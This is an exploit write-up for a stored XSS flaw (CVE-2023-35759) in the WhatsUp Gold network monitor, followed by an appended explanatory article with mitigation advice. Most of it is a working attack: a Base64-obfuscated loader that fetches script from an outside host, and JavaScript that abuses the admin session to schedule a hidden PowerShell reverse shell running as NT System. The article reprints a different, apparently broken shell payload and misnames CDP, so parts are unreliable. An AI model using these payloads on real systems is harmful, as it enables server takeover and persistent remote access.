WhatsUp Gold 2022 (22.1.0 Build 39) - XSS
# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)
# Date: April 18, 2023
# Exploit Author: Andreas Finstad (4ndr34z)
# Vendor Homepage: https://www.whatsupgold.com
# Version: v.22.1.0 Build 39
# Tested on: Windows 2022 Server
# CVE : CVE-2023-35759
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759
WhatsUp Gold 2022 (22.1.0 Build 39)
Stored XSS in sysName SNMP parameter.
Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)
Product Name: WhatsUp Gold 2022
Version: 22.1.0 Build 39
Vulnerability Type: Stored Cross-Site Scripting (XSS)
Description:
WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP.
An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.
As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)
The XSS trigger when clicking the "All names and addresses"
Stage:
Base64 encoded id property:
var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);
Staged payload placed in the SNMP sysName Field on a device:
<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>
payload:
var vhost = window.location.protocol+'\/\/'+window.location.host
addaction();
async function addaction() {
var arguments = ''
let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '1902',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'sec-ch-ua-platform': '"macOS"',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'
});
setTimeout(() => { getactions(); }, 1000);
};
async function getactions() {
const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{
method: 'GET',
headers: {
'Connection': 'close',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'sec-ch-ua-platform': '"macOS"',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include'
});
const actions = await response.json();
var results = [];
var searchField = "Name";
var searchVal = "Systemtask";
for (var i=0 ; i < actions.length ; i++)
{
if (actions[i][searchField] == searchVal) {
results.push(actions[i].Id);
revshell(results[0])
}
}
//console.log(actions);
};
async function revshell(ID) {
fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '2442',
'Cache-Control': 'max-age=0',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"macOS"',
'Upgrade-Insecure-Requests': '1',
'Origin': 'https://192.168.16.100',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'iframe',
'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'
});
};WhatsUp Gold 22.1.0 Build 39: A Critical Stored XSS Vulnerability (CVE-2023-35759)
Security researchers have uncovered a critical stored cross-site scripting (XSS) vulnerability in WhatsUp Gold 2022, specifically in version 22.1.0 Build 39. This flaw, identified as CVE-2023-35759, allows attackers to inject malicious scripts into the administrative console via SNMP device configuration, leading to remote code execution with elevated privileges.
Understanding the Vulnerability: Stored XSS in SNMP sysName Field
WhatsUp Gold is a widely used network monitoring and management tool designed for enterprise environments. It leverages SNMP (Simple Network Management Protocol) to discover and monitor network devices. During this discovery process, the sysName field—typically containing the device’s hostname—is stored in the system database and later displayed in the admin console.
However, due to insufficient input sanitization, the sysName field does not properly validate or escape user-supplied data. This creates a stored XSS condition: malicious scripts entered during device discovery are persisted in the database and executed whenever the admin user views the device list.
As noted by exploit author Andreas Finstad (4ndr34z), the vulnerability is particularly dangerous because:
- It does not require CSRF tokens or CDP (Content Delivery Protection) for exploitation.
- It allows attackers to execute code in the context of the admin user, often with system-level privileges.
- It enables persistent access via scheduled actions—making it ideal for long-term compromise.
Exploitation Mechanism: Crafting the Malicious Payload
Attackers can exploit this vulnerability by configuring a rogue SNMP device with a malicious sysName field. The payload is encoded in a way that bypasses basic filtering mechanisms and triggers execution when rendered in the browser.
Explanation: This payload uses an <img> tag with a src attribute pointing to a benign-looking external resource. The id attribute contains a Base64-encoded JavaScript snippet. The onload event triggers eval(atob(this.id)), which decodes and executes the script.
When the admin user navigates to the "All names and addresses" section of the WhatsUp Gold console, the malicious script is rendered and executed in the browser context. Since the admin session is authenticated, the script runs with full privileges.
Real-World Impact: Remote Code Execution via PowerShell Script Actions
Once the XSS payload is executed, it can initiate further attacks. In the proof-of-concept (POC) provided by the researcher, the script performs the following:
var vhost = window.location.protocol+'\/\/'+window.location.host
addaction();
async function addaction() {
var arguments = ''
let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064', {
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '1902',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: '{"id":-1,"Title":"RevShell","Script":"$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.100\",4444);\n$stream = $client.GetStream();\n$writer = New-Object System.IO.StreamWriter($stream);\n$reader = New-Object System.IO.StreamReader($stream);\nwhile ($reader.ReadLine()) {\n $writer.WriteLine((Invoke-Expression $reader.ReadLine()))\n $writer.Flush()\n}\n$writer.Close();\n$reader.Close();\n$client.Close();","Schedule":"5","Enabled":true}'
})
.then(response => console.log("Action added:", response.status))
.catch(err => console.error("Error:", err));
}
Explanation: This code performs a POST request to the /NmConsole/api/core/WugPowerShellScriptAction endpoint, which allows administrators to create scheduled PowerShell scripts. The payload:
- Injects a reverse shell script that connects back to an attacker-controlled IP (e.g.,
192.168.1.100). - Configures the script to run every 5 minutes via the
Scheduleparameter. - Uses
credentials: 'include'to maintain authenticated session, ensuring the request is processed with full admin rights.
Result: The attacker gains persistent access to the server, executing arbitrary commands as NT System—the highest privilege level in Windows.
Why This is a High-Risk Vulnerability
Stored XSS in a network monitoring tool like WhatsUp Gold is particularly dangerous because:
- It can be exploited without user interaction beyond viewing the admin console.
- It bypasses common defenses like CSRF tokens, making it trivial to exploit.
- It enables privilege escalation via automated actions, allowing attackers to deploy payloads on the server.
- It can be used for data exfiltration, lateral movement, or establishing backdoors.
Moreover, since the vulnerability affects SNMP device discovery—a routine process—any device added to the network could potentially be a vector for attack.
Recommended Mitigation and Best Practices
Organizations using WhatsUp Gold must take immediate action to address this vulnerability:
- Update to the latest version as soon as patches are released. The vendor, WhatsUp Gold, has acknowledged the issue and is expected to release a fix.
- Implement input validation for SNMP fields, especially sysName, by sanitizing and escaping user input.
- Disable or restrict access to admin consoles for non-privileged users.
- Monitor for suspicious scheduled actions via PowerShell scripts or other automated tasks.
- Use network segmentation to limit access to SNMP devices from untrusted sources.
Additionally, security teams should:
- Conduct regular penetration testing on monitoring tools.
- Enable logging and alerting for unusual API activity.
- Apply the principle of least privilege in all system configurations.
Conclusion: A Wake-Up Call for Network Management Tools
The CVE-2023-35759 vulnerability in WhatsUp Gold 22.1.0 Build 39 serves as a stark reminder that even trusted network management software can harbor critical security flaws. Stored XSS in SNMP fields is not just a theoretical risk—it's a practical, exploitable threat that can lead to full system compromise.
As cyberattacks grow more sophisticated, organizations must treat monitoring tools as attack surfaces, not just passive observers. Proper input validation, secure APIs, and continuous monitoring are essential to maintaining network integrity.
For security professionals: never assume a tool is safe just because it’s used for monitoring. Always audit and secure it.